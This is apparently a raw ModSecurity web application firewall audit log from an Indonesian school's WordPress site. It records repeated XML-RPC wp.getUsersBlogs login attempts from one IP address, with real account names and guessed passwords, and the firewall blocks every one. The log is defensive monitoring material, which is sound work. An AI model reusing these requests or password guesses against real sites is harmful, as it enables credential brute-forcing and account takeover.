Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --088f767e-E-- --088f767e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (144+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515648332289 5247 (- - -) Stopwatch2: 1745515648332289 5247; combined=3596, p1=430, p2=2962, p3=0, p4=0, p5=116, sr=86, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --088f767e-Z-- --85b4372e-A-- [25/Apr/2025:00:28:28 +0700] aAp0vN5yz20UX9VrdZPXygAAAFY 103.236.140.4 53380 103.236.140.4 8181 --85b4372e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --85b4372e-C-- wp.getUsersBlogs kesiswaan Admin!@# --85b4372e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85b4372e-E-- --85b4372e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515708367973 4332 (- - -) Stopwatch2: 1745515708367973 4332; combined=2955, p1=378, p2=2425, p3=0, p4=0, p5=90, sr=85, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85b4372e-Z-- --d43daf4f-A-- [25/Apr/2025:00:29:28 +0700] aAp0-PiVYlyO1xhz7yPFDgAAAMQ 103.236.140.4 56820 103.236.140.4 8181 --d43daf4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d43daf4f-C-- wp.getUsersBlogs kesiswaan account --d43daf4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d43daf4f-E-- --d43daf4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515768230581 5075 (- - -) Stopwatch2: 1745515768230581 5075; combined=3417, p1=403, p2=2842, p3=0, p4=0, p5=99, sr=76, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d43daf4f-Z-- --e5c01021-A-- [25/Apr/2025:00:30:25 +0700] aAp1MWLuk3f9kLjsdTaXsQAAAJM 103.236.140.4 32976 103.236.140.4 8181 --e5c01021-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e5c01021-C-- wp.getUsersBlogs kesiswaan 1234%^&* --e5c01021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c01021-E-- --e5c01021-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515825439492 4876 (- - -) Stopwatch2: 1745515825439492 4876; combined=3284, p1=383, p2=2744, p3=0, p4=0, p5=94, sr=73, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5c01021-Z-- --1d633915-A-- [25/Apr/2025:00:30:28 +0700] aAp1NMlQo524fhbIj1ycqQAAABg 103.236.140.4 33200 103.236.140.4 8181 --1d633915-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1d633915-C-- wp.getUsersBlogs kesiswaan a1s2d3f4 --1d633915-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d633915-E-- --1d633915-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515828027862 4733 (- - -) Stopwatch2: 1745515828027862 4733; combined=3369, p1=427, p2=2705, p3=0, p4=0, p5=132, sr=91, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d633915-Z-- --91557927-A-- [25/Apr/2025:00:31:28 +0700] aAp1cMlQo524fhbIj1yd0wAAABA 103.236.140.4 37512 103.236.140.4 8181 --91557927-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --91557927-C-- wp.getUsersBlogs kesiswaan anthony --91557927-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91557927-E-- --91557927-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (123+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515888022929 4144 (- - -) Stopwatch2: 1745515888022929 4144; combined=2954, p1=385, p2=2438, p3=0, p4=0, p5=77, sr=80, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91557927-Z-- --e6051136-A-- [25/Apr/2025:00:32:28 +0700] aAp1rGLuk3f9kLjsdTaaKgAAAIE 103.236.140.4 42868 103.236.140.4 8181 --e6051136-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e6051136-C-- wp.getUsersBlogs kesiswaan tennis --e6051136-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6051136-E-- --e6051136-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (139+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745515948275031 5090 (- - -) Stopwatch2: 1745515948275031 5090; combined=3498, p1=468, p2=2858, p3=0, p4=0, p5=101, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6051136-Z-- --be5ff223-A-- [25/Apr/2025:00:33:28 +0700] aAp16GLuk3f9kLjsdTaazQAAAIQ 103.236.140.4 47864 103.236.140.4 8181 --be5ff223-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --be5ff223-C-- wp.getUsersBlogs kesiswaan mynoob --be5ff223-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be5ff223-E-- --be5ff223-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (130+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516008267834 4791 (- - -) Stopwatch2: 1745516008267834 4791; combined=3282, p1=460, p2=2652, p3=0, p4=0, p5=97, sr=116, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be5ff223-Z-- --2d7b161f-A-- [25/Apr/2025:00:34:28 +0700] aAp2JGLuk3f9kLjsdTab7wAAAI0 103.236.140.4 52188 103.236.140.4 8181 --2d7b161f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2d7b161f-C-- wp.getUsersBlogs timkreatif 1qazxsw2 --2d7b161f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d7b161f-E-- --2d7b161f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516068214480 4554 (- - -) Stopwatch2: 1745516068214480 4554; combined=3186, p1=388, p2=2651, p3=0, p4=0, p5=87, sr=72, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d7b161f-Z-- --a7a28d36-A-- [25/Apr/2025:00:35:28 +0700] aAp2YN5yz20UX9VrdZPffAAAAFM 103.236.140.4 56676 103.236.140.4 8181 --a7a28d36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a7a28d36-C-- wp.getUsersBlogs timkreatif smkn22-jkt.sch888 --a7a28d36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7a28d36-E-- --a7a28d36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (137+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516128262088 5692 (- - -) Stopwatch2: 1745516128262088 5692; combined=4297, p1=533, p2=3570, p3=0, p4=0, p5=115, sr=90, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7a28d36-Z-- --7ddaa926-A-- [25/Apr/2025:00:36:28 +0700] aAp2nN5yz20UX9VrdZPggQAAAEg 103.236.140.4 32968 103.236.140.4 8181 --7ddaa926-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7ddaa926-C-- wp.getUsersBlogs timkreatif 123@qwe --7ddaa926-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ddaa926-E-- --7ddaa926-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (140+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516188004783 4917 (- - -) Stopwatch2: 1745516188004783 4917; combined=3863, p1=451, p2=3227, p3=0, p4=0, p5=107, sr=84, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ddaa926-Z-- --df956a16-A-- [25/Apr/2025:00:37:28 +0700] aAp22MlQo524fhbIj1yl3AAAABY 103.236.140.4 37744 103.236.140.4 8181 --df956a16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --df956a16-C-- wp.getUsersBlogs timkreatif xxxx --df956a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df956a16-E-- --df956a16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516248023814 4592 (- - -) Stopwatch2: 1745516248023814 4592; combined=3377, p1=398, p2=2822, p3=0, p4=0, p5=93, sr=80, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df956a16-Z-- --c160e425-A-- [25/Apr/2025:00:37:51 +0700] aAp278lQo524fhbIj1ymmwAAABI 103.236.140.4 39900 103.236.140.4 8181 --c160e425-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c160e425-C-- wp.getUsersBlogs timkreatif 1234%^&* --c160e425-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c160e425-E-- --c160e425-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516271186695 4271 (- - -) Stopwatch2: 1745516271186695 4271; combined=2949, p1=362, p2=2442, p3=0, p4=0, p5=89, sr=69, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c160e425-Z-- --26e6ba71-A-- [25/Apr/2025:00:38:28 +0700] aAp3FN5yz20UX9VrdZPjPgAAAFA 103.236.140.4 43490 103.236.140.4 8181 --26e6ba71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --26e6ba71-C-- wp.getUsersBlogs timkreatif livetest --26e6ba71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26e6ba71-E-- --26e6ba71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (131+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516308299768 4111 (- - -) Stopwatch2: 1745516308299768 4111; combined=2774, p1=362, p2=2276, p3=0, p4=0, p5=80, sr=75, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26e6ba71-Z-- --982a1b4f-A-- [25/Apr/2025:00:39:28 +0700] aAp3UGLuk3f9kLjsdTagsQAAAIo 103.236.140.4 48600 103.236.140.4 8181 --982a1b4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --982a1b4f-C-- wp.getUsersBlogs timkreatif evite --982a1b4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982a1b4f-E-- --982a1b4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (132+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516368112362 4928 (- - -) Stopwatch2: 1745516368112362 4928; combined=3408, p1=438, p2=2807, p3=0, p4=0, p5=97, sr=93, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982a1b4f-Z-- --31882720-A-- [25/Apr/2025:00:40:28 +0700] aAp3jMlQo524fhbIj1yq2wAAABg 103.236.140.4 53924 103.236.140.4 8181 --31882720-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --31882720-C-- wp.getUsersBlogs timkreatif 789456 --31882720-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31882720-E-- --31882720-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (133+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745516428339754 4537 (- - -) Stopwatch2: 1745516428339754 4537; combined=3497, p1=382, p2=2964, p3=0, p4=0, p5=90, sr=80, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31882720-Z-- --193ff947-A-- 